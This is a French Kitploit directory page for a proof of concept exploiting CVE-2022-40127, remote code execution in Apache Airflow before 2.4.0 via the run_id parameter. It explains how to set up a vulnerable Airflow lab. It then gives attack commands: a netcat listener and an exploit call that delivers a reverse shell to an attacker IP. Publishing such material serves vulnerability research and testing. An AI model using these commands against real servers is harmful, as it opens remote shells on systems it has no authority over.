Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-40127-Airflow-RCE — Preuve de concept d'exploitation pour CVE-2022-40127 ciblant l'exécution de code à distance (RCE) dans Apache Airflow via un paramètre run_id malveillant, avec livraison automatisée d'un shell inversé. | Kitploit
Outils/GitHubGitHub/jakabakos/cve-2022-40127-airflow-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubjakabakos/cve-2022-40127-airflow-rce

CVE-2022-40127-Airflow-RCE

Preuve de concept d'exploitation pour CVE-2022-40127 ciblant l'exécution de code à distance (RCE) dans Apache Airflow via un paramètre run_id malveillant, avec livraison automatisée d'un shell inversé.

Voir le dépôt
212il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Apache Airflow < 2.4.0 RCE (CVE-2022-40127)

PoC pour CVE-2022-40127, une vulnérabilité RCE d'Apache Airflow affectant les versions antérieures à 2.4.0.

La description du rapport officiel indique :

Une vulnérabilité dans les DAGs d'exemple d'Apache Airflow permet à un attaquant ayant accès à l'interface utilisateur et pouvant déclencher des DAGs, d'exécuter des commandes arbitraires via le paramètre run_id fourni manuellement. Ce problème affecte Apache Airflow dans les versions antérieures à 2.4.0.

Ce dépôt a été créé pour un article de blog d'analyse CVE disponible sur le blog vsociety.

https://github.com/jakabakos/CVE-2022-40127/assets/42498816/2094f2ec-f074-41e6-99f4-f9f77dd09df6

Utilisation

Vous pouvez cloner le dépôt :

root@kitploit:~
git clone https://github.com/jakabakos/CVE-2022-40127.git

Installer et exécuter Airflow v2.3.4

Via docker-compose

Téléchargez le fichier docker-compose depuis le dépôt officiel

root@kitploit:~
cd /opt/
mkdir airflow-2.3.4 && cd airflow-2.3.4
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'

Exécutez Airflow

root@kitploit:~
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
docker-compose up airflow-init
docker-compose up
open localhost:8080

Dans ce cas, le nom d'utilisateur et le mot de passe seront airflow.

Manuellement

Basé sur les instructions d'installation officielles :

root@kitploit:~
pip3.8 install "apache-airflow==2.3.4" --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.3.4/constraints-3.7.txt"

Vous pouvez vérifier si l'installation a réussi avec les commandes which airflow et/ou airflow info.

Exécutez Airflow

root@kitploit:~
airflow standalone

Consultez le mot de passe et le nom d'utilisateur générés dans les journaux.

Utilisation de l'exploit

Tout d'abord, installez les paquets requis avec pip :

root@kitploit:~
pip3 install -r requirements.txt

Consultez les options disponibles avec :

root@kitploit:~
python3 exploit.py --help

Vous pouvez vérifier si l'hôte peut être exploité ou non :

root@kitploit:~
python3 exploit.py -u airflow -p airflow -url http://localhost:8080

Configurez un écouteur local pour le shell inverse dans une autre session de terminal :

root@kitploit:~
nc -lvnp 4242

Exécutez le script en mode attaque avec cette commande :

root@kitploit:~
python3 exploit.py -u airflow -p airflow -url http://localhost:8080 -a -host <attacker_ip> -port 4242

Vous devriez voir la connexion dans la minute qui suit. preuve

Télécharger l’outil